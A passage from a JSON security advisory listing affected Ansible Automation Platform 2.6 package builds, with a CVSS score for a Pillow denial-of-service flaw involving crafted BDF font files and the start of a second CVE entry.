"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted BDF font file"
},
{
"cve": "CVE-2026-55380",
"cwe": {
"id": "CWE-1285",
"name": "Improper Validation of Specified Index, Position, or Offset in Input"
},
"discovery_date": "2026-07-06T20:01:42.245051+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
